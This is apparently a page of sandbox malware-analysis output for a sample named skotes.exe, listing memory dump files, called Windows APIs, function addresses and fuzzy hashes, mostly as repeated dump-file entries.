Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: aa6f44f7d6b39a7489f124fcf9c1dbae0dd5c5f46f9541e4a0d60dbbb1619aeb
Instruction ID: ecfe056904d7dfb0f1a741a75aaafd88b5cd236d4befe5f05a427b4665ab8b8a
Opcode Fuzzy Hash: aa6f44f7d6b39a7489f124fcf9c1dbae0dd5c5f46f9541e4a0d60dbbb1619aeb
Instruction Fuzzy Hash: DD2172302491018AFF24E76B9C56B3DB366DFC1306F244A16EF04D63D1CB765589539B

Function 0095A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f9cb0a76fb0e3be2740b6cd43695e60c04a81cc878b66d7a89f9399849452743
Instruction ID: 86c6355fa7e6b40bcea27dced7d22d8d2d164f68a18dcca6d680ab9d1fb9f3a7
Opcode Fuzzy Hash: f9cb0a76fb0e3be2740b6cd43695e60c04a81cc878b66d7a89f9399849452743
Instruction Fuzzy Hash: 0E21A9317052009BEB18DB29DD85B6CB766EBD1316F244319E814D76E0C776A9C4835B

Non-executed Functions

Function 0098CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0098CC66

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: 600cdfe0eb3a72049971f59de4e2ffbfd6c3fcbb15805a515f39c89af8d3dab8
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 60B148B2D046459FDB11EF28C881BBEBBE9EF95340F14856AE855EB382D6349D01CB70

Function 00952EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00952F5F
__Mtx_unlock.LIBCPMT ref: 00952FCC
__Mtx_unlock.LIBCPMT ref: 009530F5
__Mtx_unlock.LIBCPMT ref: 0095319B

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: ed4d905ddcb2a76dc79fe9216afbcc24ada544a5f0214588b872425e55ed24a5
Instruction ID: 148e7deb3509af0e9ac742ca3ffadfe9ed402fc483fa249bc3e80ff155653727
Opcode Fuzzy Hash: ed4d905ddcb2a76dc79fe9216afbcc24ada544a5f0214588b872425e55ed24a5
Instruction Fuzzy Hash: 24A1FFB0A05715AFDB20DB76C94476AB7A8FF55361F048129FC15D7281EB31EA08CBD1

Analysis Process: skotes.exePID: 4248, Parent PID: 6808COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1875
Total number of Limit Nodes:	9

Executed Functions

Function 0098652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0098652A,?,?,?,?,?,00987661), ref: 00986566

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
